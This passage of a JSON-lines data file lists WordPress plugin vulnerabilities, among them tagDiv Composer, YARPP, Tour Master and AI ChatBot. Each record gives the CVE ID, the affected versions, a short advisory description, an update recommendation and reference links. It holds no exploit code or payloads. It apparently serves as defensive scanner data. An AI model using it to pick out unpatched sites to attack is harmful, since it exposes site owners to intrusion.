version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/561ec1b2-ee26-4e0c-b437-d70b04be5b4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/561ec1b2-ee26-4e0c-b437-d70b04be5b4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-limit-failed-login-attempts\\\/tags\\\/5.3\\\/login.php#L466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-limit-failed-login-attempts\\\/tags\\\/5.3\\\/login.php#L466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163023\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1705","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3. This is due to missing or incorrect nonce validation within the td_ajax_get_views AJAX action. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaa8c34-cf7b-4630-adc8-cbb534deff89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaa8c34-cf7b-4630-adc8-cbb534deff89?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2804","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress, used by the Newspaper theme, is vulnerable to Reflected Cross-Site Scripting via the 'account_id' and 'account_username' parameters in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41ef545a-7de1-406c-8686-57216e697a1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41ef545a-7de1-406c-8686-57216e697a1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1044","slug":"customer-reviews-woocommerce","versionImpact":"5.38.12","versionEndExcluding":"5.39.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled.","recommendation":"Update to version 5.39.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4420c334-1ea4-4549-b391-150702abc2f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4420c334-1ea4-4549-b391-150702abc2f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6979","slug":"customer-reviews-woocommerce","versionImpact":"5.38.9","versionEndExcluding":"5.38.10","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ivole_import_upload_csv AJAX action in all versions up to, and including, 5.38.9. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.38.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af801db-44a6-4cd3-bd1a-3125490c8c48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af801db-44a6-4cd3-bd1a-3125490c8c48?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.proton.me\\\/urls\\\/K4R2HDQBS0#iuTPm3NqZEdz\",\"name\":\"https:\\\/\\\/drive.proton.me\\\/urls\\\/K4R2HDQBS0#iuTPm3NqZEdz\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018507%40customer-reviews-woocommerce&new=3018507%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018507%40customer-reviews-woocommerce&new=3018507%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3016708%40customer-reviews-woocommerce&new=3016708%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3016708%40customer-reviews-woocommerce&new=3016708%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0579","slug":"yet-another-related-posts-plugin","versionEndExcluding":"5.30.3","description":"The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/574f7607-96d8-4ef8-b96c-0425ad7e7690\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/574f7607-96d8-4ef8-b96c-0425ad7e7690\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6495","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.9","versionEndExcluding":"5.30.10","description":"The YARPP \u2013 Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.30.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d586e455-c73f-4916-a926-4d53699bb434?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d586e455-c73f-4916-a926-4d53699bb434?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037032%40yet-another-related-posts-plugin%2Ftrunk&old=2999784%40yet-another-related-posts-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037032%40yet-another-related-posts-plugin%2Ftrunk&old=2999784%40yet-another-related-posts-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0602","slug":"yet-another-related-posts-plugin","versionEndExcluding":"5.30.10","description":"The YARPP \u2013 Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0602\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0602\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037032\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.10\\\/includes\\\/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin\\\/tags\\\/5.30.9\\\/includes\\\/yarpp_options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037032\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.10\\\/includes\\\/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin\\\/tags\\\/5.30.9\\\/includes\\\/yarpp_options.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13369","slug":"tourmaster","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The Tour Master - Tour Booking, Travel, Hotel plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018review_id\u2019 parameter in all versions up to, and including, 5.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/tour-master-tour-booking-travel-wordpress-plugin\\\/20539780\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/tour-master-tour-booking-travel-wordpress-plugin\\\/20539780\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.goodlayers.com\\\/document\\\/changelog-tour-master-plugin\\\/\",\"name\":\"https:\\\/\\\/support.goodlayers.com\\\/document\\\/changelog-tour-master-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d7f2cb6-5c19-4126-9f39-439cf6057c5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d7f2cb6-5c19-4126-9f39-439cf6057c5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8629","slug":"woocommerce-multilingual","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The WooCommerce Multilingual & Multicurrency with WPML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.3.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494dc869-6f4d-428b-99a8-87212f3007be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494dc869-6f4d-428b-99a8-87212f3007be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multilingual\\\/tags\\\/5.3.7\\\/inc\\\/class-wcml-comments.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multilingual\\\/tags\\\/5.3.7\\\/inc\\\/class-wcml-comments.php#L257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164233\\\/woocommerce-multilingual\\\/trunk\\\/inc\\\/class-wcml-comments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164233\\\/woocommerce-multilingual\\\/trunk\\\/inc\\\/class-wcml-comments.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9302","slug":"app-builder","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The App Builder \u2013 Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.3.7. This is due to the verify_otp_forgot_password() and update_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any users passwords, including an administrator.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eb9d676-4fa0-4bdc-af44-5d7e1dd8c6e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eb9d676-4fa0-4bdc-af44-5d7e1dd8c6e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161215\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161215\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3715","slug":"bold-page-builder","versionImpact":"5.3.5","versionEndExcluding":"5.3.6","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-text parameter in all versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.5\\\/content_elements_misc\\\/js\\\/content_elements.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.5\\\/content_elements_misc\\\/js\\\/content_elements.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292512\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292512\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2452dd7-2bb9-4a0c-81db-6699a9b049ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2452dd7-2bb9-4a0c-81db-6699a9b049ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5161","slug":"modal-window","versionImpact":"5.3.5","versionEndExcluding":"5.3.6","description":"The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/shortcode.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/shortcode.php#L53\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file196\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/class-public.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/class-public.php#L73\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file195\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e2129f-6a2c-45e4-a0cf-7d8d5f563a7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e2129f-6a2c-45e4-a0cf-7d8d5f563a7f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0453","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_delete_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete files from a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0452","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_upload_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files to a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L208\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0451","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the openai_file_list_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to list files existing in a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12400","slug":"tourmaster","versionImpact":"5.3.4","versionEndExcluding":"5.3.5","description":"The tourmaster WordPress plugin before 5.3.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","recommendation":"Update to version 5.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11356","slug":"tourmaster","versionEndExcluding":"5.3.4","description":"The tourmaster WordPress plugin before 5.3.4 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 5.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d70df54e-e99e-4539-9fd9-002c0642137e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d70df54e-e99e-4539-9fd9-002c0642137e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1331","slug":"team-members","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Team Members WordPress plugin before 5.3.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2bac900-3d8f-406c-b03d-c8db156acc59\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2bac900-3d8f-406c-b03d-c8db156acc59\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1664","slug":"essential-blocks","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Parallax slider in all versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250957\\\/essential-blocks\\\/tags\\\/5.3.2\\\/assets\\\/blocks\\\/parallax-slider\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250957\\\/essential-blocks\\\/tags\\\/5.3.2\\\/assets\\\/blocks\\\/parallax-slider\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6abfa01b-e2ec-412c-a17d-e8bd1f5ac228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6abfa01b-e2ec-412c-a17d-e8bd1f5ac228?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10103","slug":"mailpoet","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"In the process of testing the MailPoet  WordPress plugin before 5.3.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89660883-5f34-426a-ad06-741c0c213ecc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89660883-5f34-426a-ad06-741c0c213ecc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
